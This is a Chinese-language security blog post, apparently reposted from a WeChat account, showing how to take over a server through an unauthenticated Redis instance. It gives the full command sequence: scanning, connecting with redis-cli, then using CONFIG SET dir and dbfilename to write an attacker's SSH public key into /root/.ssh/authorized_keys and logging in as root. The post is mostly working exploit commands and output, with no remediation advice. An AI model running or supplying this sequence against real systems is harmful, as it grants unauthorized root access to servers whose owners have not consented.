Redis未授权访问导致服务器被控制

admin 2021年9月4日09:38:13评论62 views字数 1369阅读4分33秒阅读模式

通过使用nmap扫描,发现某一端口对应的服务为Redis,然后我们可以尝试看看是否是未授权访问!

    首先使用下列命令安装Redis tools:

root@:~# apt-get install redis-tools


然后通过下列命令看是否是未授权访问:


root@:~# redis-cli -h 10.198.131.1

10.198.131.1:6379>


然后我们可以使用免密登录的方式进行相关攻击:

    生成公钥:


root@lsy:~/.ssh# ssh-keygen -t rsa


root@lsy:~/.ssh# cat id_rsa.pub 

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn 


root@lsy:~/.ssh#


将公钥写入远程服务器:


root@lsy:~/.ssh# redis-cli -h 10.198.131.1


10.198.131.1:6379> CONFIG SET dir /root/.ssh/

OK

10.198.131.1:6379> CONFIG SET dbfilename authorized_keys

OK

10.198.131.1:6379> set xxxx "nnnssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsynnn"

OK

10.198.131.1:6379> save

OK

10.198.131.1:6379> exit


 使用ssh远程登录:

root@lsy:~/.ssh# ssh 10.198.131.1

Redis未授权访问导致服务器被控制

Redis未授权访问导致服务器被控制


更多飓风网络安全动态请关注:

Redis未授权访问导致服务器被控制


本文始发于微信公众号(飓风网络安全):Redis未授权访问导致服务器被控制

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月4日09:38:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Redis未授权访问导致服务器被控制http://cn-sec.com/archives/358841.html

发表评论

匿名网友 填写信息